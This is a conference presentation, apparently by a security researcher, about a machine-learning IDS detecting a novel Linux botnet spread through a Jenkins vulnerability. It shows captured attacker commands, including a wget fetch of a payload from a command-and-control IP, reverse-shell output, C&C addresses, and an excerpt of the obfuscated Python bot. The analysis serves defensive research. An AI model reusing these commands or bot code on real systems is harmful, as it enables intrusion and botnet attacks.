Robots against robots: How a Machine Learning IDS detected a novel Linux Botnet

Sebastian Garcia

@eldracote

sebastian.garcia@agents.fel.cvut.cz

https://stratosphereips.org

bit.ly/SS-RvR

The Detection

  • January 18th, 2016.

  • Testing Stratosphere IPS in the University network.

  • Have an alert from a malicious behavior in the IDS.

147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]: 88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,

"For a long time there was a periodic connection (freq 5s-60s), to an uncommon port, with large flows of medium duration."

The Analysis: Visibility

  • Argus flow suite from Qosient.

  • Storage of 3,000 hosts continually (1 year ~= 80GB)

  • Back in time!

The Detected Connection

Sent: "+.............P.43.249.81.135.......?."
Recv: ".................................." (MBs)

Recv once:  "import time as O000OO0O0O00OO00O"

  • 43.249.81.135

    • No VirusTotal detection.

    • AS58879 Shanghai Anchang Network Security Technology Co.,L. China.

    • Last known domain: lyzqmir2.com. Minecraft server.

The Begining: Jan 16th, 2016

  • 103.242.134.118 port 33333/TCP [VT:7]​

    • S:"/bin/sh: 0: can't access tty; job control turned off.$,"

    • S:"tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$

    • S:"wget 23.247.5.27:435/abcc.c"

    • R:"ps aux |grep abcc.ccd /tmp.m"

  • 23.247.5.27 port 435/TCP [VT:0]

  • 23.247.5.27 port 25000/TCP (main CC)

    • "=...-== Love AV ==-:..Linux 3.2.0-4-amd64"

The Analysis

  • 103.242.134.118 port 23031/TCP

    • ​"version:0.1"

    • "heartOK","hearta"

    • "deployOK:115.239.248.88:80:3:60 heartOK"

  • 103.242.134.118 port 33333/TCP

    • "http://222.179.116.23:8080/theme/1/pys.py"

    • Python script?

Our computer Attacking?

  • Hundreds of connections to IPs in China, port 80/UDP.

  • 115.239.248.88 port 80/UDP [MoveInternet Network Technology Co.,Ltd.,CN]

    • Few Kb of binary data sent.

    • Could not find a motive or explanation.

The Compromise

  • What we knew

    • Tomcat involved.

    • Date range.

  • We found strange POSTs to Jenkins minutes before

    • POST /jenkins/descriptor/hudson.model.DownloadService/byId/
      hudson.tasks.Maven.MavenInstaller/postBack

    • POST /jenkins/ajaxExecutors

  • Remote Jenkins code execution vulnerability CVE-2015-8103. Metasploit module.

The Python Botnet Script

import time as O000OO0O0O00OO00O
import math as O000O0OO0O0O00O0O
import socket as OO0000OOOOOO0O000
import os as OO00000000OO000OO
import base64 as O0O0OOOO00O0O00OO
import threading as O00O000000OOO0OO0
import random as O0OOO0O000OO0O00O
class fbiabcd8c (O00O000000OOO0OO0 .Thread ):
        def __init__ (O0000O0OOOOOOO0O0 ):
                O00O000000OOO0OO0 .Thread .__init__ (O0000O0OOOOOOO0O0 )
        def run (O0OO0OOOOO000O000 ):
                global SvneciA
                global fn023ca
                global fABRVUqfh
                if (fn023ca ==False ):
                        return
                O00O0O00000OOO0OO =0
                while fABRVUqfh :
                        O00O0O00000OOO0OO +=1
                        if (SvneciA >=O00O0O00000OOO0OO ):
                                O000OO0O0O00OO00O .sleep (1 )
                        else :
                                break
                fABRVUqfh =False
                try :
                        FcANECa .send (O0O0OOOO00O0O00OO .b64decode ("dWRwU3RvcHBlZA=="))

The Python Botnet Script

  • Obfuscated. Deobfuscated by Veronica Valeros. Thx!  

  • Threads.

  • C&C channel with 10s timeouts.

    • ​Receives orders and executes commands, including access to OS.

  • Confuse analysts? or DDoS?

    • Function to send random UDP data to IPs received by C&C.

How Machine Learning detected this?

Stratosphere IPS

Free

Software

Machine

Learning

Behavioral

IPS

Protecting

NGOs

Stratosphere IPS

  • Model network behaviors as a string of letters.

  • 1 flow        3 features         1 letter

Behavior of Connections

Markov Chains Models

  • Create, train and store a Markov Chain models

Behavioral Detection

Trained

Markov Models

Similarity to Unknown Traffic

Conclusion

  • Still unknown and hidden.

  • Could not be detected by usual protections.

    • No fingerprints, no reputations, no rootkits.

  • Continuous Visibility is paramount.

  • Behavioral Machine Learning is improving.

Questions? And Thanks!

Sebastian Garcia

sebastian.garcia@agents.fel.cvut.cz

@eldracote

Workshop Malware Traffic: bit.ly/SSdirtywork

Stratosphere IPS. Free Software Machine Learning for the Community.

By eldraco

Stratosphere IPS. Free Software Machine Learning for the Community.

Presentation about a Linux Botnet analysis for www.security-session.cz

  • 1,577